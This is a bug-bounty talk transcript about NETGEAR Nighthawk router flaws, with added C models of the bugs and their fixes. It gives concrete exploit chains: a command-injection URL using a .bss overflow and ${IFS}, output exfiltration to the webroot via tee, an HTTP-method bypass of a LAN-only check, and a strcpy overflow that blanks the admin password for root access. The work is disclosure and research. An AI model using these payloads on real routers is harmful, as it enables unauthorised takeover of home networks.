NETGEAR Bug Bounty
A heartwarming little story that happened in Japan
Lays
May 20, 2017
Research
Transcript
Lays @ HITCON CTF Team / 2017 May

Here's how the story goes

SECCON CTF in Japan, early 2017
I won't talk about the CTF itself; everyone here knows it better than I do
Having come all the way to Japan, it seemed we should do something meaningful
So we bought steaks and pan-fried them.
Well fed, idle minds wander: with everyone in Japan for once, someone suggested we go bug hunting together (?)
Doing bug bounty as a team might bring some fresh ideas
NETGEAR on bugcrowd
Target 1: Nighthawk X4S

First try
• Download the firmware
• binwalk to extract the SquashFS filesystem
• Grab some CGIs from /www to feed
• Pwn it and profit!
Pre-auth CGIs? Only two are real CGIs …

RMT_invite.cgi
• It calls another binary: proccgi … and it's open source!

proccgi, from 1997
• A bigger attack surface? We just got nothing…
Second try
• The HTTP server
• Pwn it and profit!

/usr/sbin/uhttpd
• It's open source too!
• Calls net-cgi to process CGI requests
/usr/sbin/net-cgi
ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked
Only NX enabled
/usr/sbin/net-cgi
• Found a command injection!
• device_uuid is created from the User-Agent and the IP address
• But it's also filtered out… only alphanumerics are allowed

/usr/sbin/net-cgi
• Found another buffer overflow!
• Keeps reading until a space / tab / newline
• But it's just an overflow of a global variable…

/usr/sbin/net-cgi
• Exploit chain!
• Overwrite device_uuid in .bss after it has been filtered

/usr/sbin/net-cgi
• So now the command injection works
• No space / tab available? Use ${IFS}
http://[ip]/FW_log.htm?%20timestamp=[A*504];sleep${IFS}10;
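The net-cgi chain above (device_uuid filtered to alphanumerics, then an unbounded "read until whitespace" into a neighbouring .bss buffer that overwrites device_uuid after the filter has run, with ${IFS} standing in for the banned space), as an added C model. This is not the slides' or NETGEAR's code: the two globals being adjacent with a 504-byte first field, the function names, and the placeholder command some_tool are assumptions made for the demonstration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed model, not the real net-cgi layout: the unbounded
 * "timestamp" buffer is assumed to sit directly before device_uuid in
 * .bss. Both live in one backing array so the out-of-bounds write stays
 * well-defined C.
 */
enum { TS_LEN = 504, UUID_LEN = 64 };
static char bss[TS_LEN + UUID_LEN];
static char *const g_timestamp   = bss;          /* overflowed field   */
static char *const g_device_uuid = bss + TS_LEN; /* lands right after  */

const char *current_device_uuid(void) { return g_device_uuid; }

/* Step 1: device_uuid is derived from User-Agent and client IP; the
 * filter keeps only alphanumerics, so direct injection fails. */
void set_device_uuid(const char *user_agent, const char *ip)
{
    char raw[256];
    size_t n = 0;
    snprintf(raw, sizeof raw, "%s-%s", user_agent, ip);
    for (const char *p = raw; *p && n < UUID_LEN - 1; p++)
        if (isalnum((unsigned char)*p))
            g_device_uuid[n++] = *p;
    g_device_uuid[n] = '\0';
}

/* Step 2 (vulnerable): copy the timestamp value until space, tab or
 * newline with no length check, the overflow the slides describe. */
void parse_timestamp_vuln(const char *value)
{
    char *dst = g_timestamp;
    while (*value && *value != ' ' && *value != '\t' && *value != '\n')
        *dst++ = *value++;          /* runs past TS_LEN into device_uuid */
    *dst = '\0';
}

/* Step 2 (hardened): the same loop, bounded by the destination size. */
void parse_timestamp_fixed(const char *value)
{
    size_t n = 0;
    while (*value && *value != ' ' && *value != '\t' && *value != '\n'
           && n < TS_LEN - 1)
        g_timestamp[n++] = *value++;
    g_timestamp[n] = '\0';
}

/* Step 3: device_uuid is interpolated into a shell command line.
 * "some_tool" is a placeholder; the real command is not on the slides. */
void build_command(char *out, size_t outlen)
{
    snprintf(out, outlen, "some_tool %s", g_device_uuid);
}

/* Run the chain end to end. Returns 1 if the injected command survives
 * into the shell command line, 0 if it was stopped. */
int injection_reaches_shell(int hardened)
{
    char payload[TS_LEN + 64];
    char cmd[TS_LEN + UUID_LEN + 32];

    set_device_uuid("curl/7.0", "192.168.1.2");   /* filtered: clean */

    /* %20timestamp=[A*504];sleep${IFS}10;  ${IFS} replaces the space
     * that the whitespace-terminated read would otherwise stop at. */
    memset(payload, 'A', TS_LEN);
    strcpy(payload + TS_LEN, ";sleep${IFS}10;");

    if (hardened)
        parse_timestamp_fixed(payload);
    else
        parse_timestamp_vuln(payload);

    build_command(cmd, sizeof cmd);
    return strstr(cmd, ";sleep${IFS}10;") != NULL;
}

int main(void)
{
    printf("vulnerable: %s\n", injection_reaches_shell(0) ? "injected" : "blocked");
    printf("hardened:   %s\n", injection_reaches_shell(1) ? "injected" : "blocked");
    return 0;
}
```

The point of the model is that the alphanumeric filter is applied at the time device_uuid is built, not at the time it is used; any later write into the same memory, here a length-unchecked copy into the preceding global, defeats the filter without touching it. Bounding the copy (or validating device_uuid immediately before it is passed to the shell) closes the chain.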
But how do we test our exploit…?
PChome 24h! But we're in Japan…
Exploit
• Writing to stdout didn't work :(
• Write the output to a file and copy it to the webroot
• Access the output file:
curl http://[ip]/FW_log.htm?%20timestamp=[A*504];[cmd]|tee${IFS}/www/out.js;

Report
• NETGEAR told me it was a duplicate after 2 weeks
(╯‵□′)╯︵ ┴─┴
Target 2: Nighthawk X8 (more expensive than the steaks we fried in Japan)

Nighthawk X8
• Nothing interesting in the CGI files either
• Different HTTP server from the X4S
• Most CGI requests are handled by httpd

/usr/sbin/httpd
ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked
Only NX enabled
/usr/sbin/httpd
• It was boring on the plane… so I found a stack overflow
• A strcpy from QUERY_STRING
• How do we get there?
Stack overflow
• Triggered if the URL starts with /shares
• But we can only access /shares from the LAN … really?

Stack overflow
• The check is only a strncmp against "GET /shares"
• Bypass it by sending "HEAD /shares" or something like "XXXX /shares"
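The "GET /shares" check and its bypass, as an added C model that is not the slides' or NETGEAR's httpd code: the LAN-only filter matches the raw request line, while routing looks at the parsed path, so any method other than GET reaches the handler. Function names, return strings and the hardened variant are assumptions made for the demonstration; the real binary's dispatcher is not on the slides.

```c
#include <stdio.h>
#include <string.h>

/* Split "METHOD PATH HTTP/x.y" into method and path (constructed helper).
 * Returns 0 on a malformed line. */
static int parse_request_line(const char *line, char *method, size_t mlen,
                              char *path, size_t plen)
{
    const char *sp = strchr(line, ' ');
    if (!sp || (size_t)(sp - line) >= mlen)
        return 0;
    memcpy(method, line, sp - line);
    method[sp - line] = '\0';

    const char *start = sp + 1;
    const char *end = strchr(start, ' ');
    size_t n = end ? (size_t)(end - start) : strlen(start);
    if (n == 0 || n >= plen)
        return 0;
    memcpy(path, start, n);
    path[n] = '\0';
    return 1;
}

/* Vulnerable: the WAN filter only recognises "GET /shares" on the raw
 * line. "HEAD /shares" or "XXXX /shares" slips past it, yet the router
 * still dispatches on the path and reaches the /shares handler. */
const char *route_vuln(const char *line, int from_wan)
{
    char method[16], path[256];
    if (!parse_request_line(line, method, sizeof method, path, sizeof path))
        return "bad-request";
    if (from_wan && strncmp(line, "GET /shares", 11) == 0)
        return "denied";
    if (strncmp(path, "/shares", 7) == 0)
        return "shares-handler";           /* strcpy(QUERY_STRING) lives here */
    return "other";
}

/* Hardened: decide on the parsed path, independent of the method, and
 * refuse methods the server does not implement. */
const char *route_fixed(const char *line, int from_wan)
{
    char method[16], path[256];
    if (!parse_request_line(line, method, sizeof method, path, sizeof path))
        return "bad-request";
    if (strcmp(method, "GET") != 0 && strcmp(method, "HEAD") != 0 &&
        strcmp(method, "POST") != 0)
        return "bad-request";
    if (strncmp(path, "/shares", 7) == 0)
        return from_wan ? "denied" : "shares-handler";
    return "other";
}

int main(void)
{
    const char *lines[] = { "GET /shares/x HTTP/1.1",
                            "HEAD /shares/x HTTP/1.1",
                            "XXXX /shares/x HTTP/1.1" };
    for (size_t i = 0; i < 3; i++)
        printf("%-26s from WAN: vuln=%s fixed=%s\n", lines[i],
               route_vuln(lines[i], 1), route_fixed(lines[i], 1));
    return 0;
}
```

The general lesson is the one a reviewer would apply to any such check: an access decision must be made on the same parsed representation the dispatcher uses, never on a string prefix of the raw request.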
Stack overflow
• So now we can crash the HTTP server
• Let's try to control PC!

Control the PC
• No URL decoding
• curl / requests don't support unprintable bytes in URLs
• But it's HTTPS…
• Send raw HTTPS requests

But how do I test my exploit…? Can I get a debug environment?

Debug
• There are no ssh / telnet features…
• We need another way to debug!
So I found another command injection
• device_name in the lan.cgi handler
Now let's see if we've controlled PC
• dmesg doesn't work :(
• Found some useful gadgets: system("echo Kernel crash >> /tmp/info.txt")
• Read /tmp/info.txt to check whether PC is controlled

Now we control PC. But where do we jump…?
Exploit
• Stack overflow caused by strcpy
• We can only use one gadget
• It's not a CTF: system("/bin/sh") doesn't work
• We need some magic gadgets!

So I found this:
acosNvramConfig_set("http_passwd", ""); acosNvramConfig_save();
• So we can set the login password to empty!
• After the server restarts, we can log in without auth
Exploit
• Combine the 2 bugs above
• We can bypass auth and execute commands with root privileges!

Report
• Got a $1500 bounty after 2 months ヽ(✿゚▽゚)ノ

Conclusion
• An expensive product is not necessarily a secure one
• Bug bounties do quite a bit to improve product security
• Simple bugs can be found by anyone; the sneakier the approach, the less likely you are to collide with someone else's report
• You only get a chance if you look, so when you have spare time, come dig together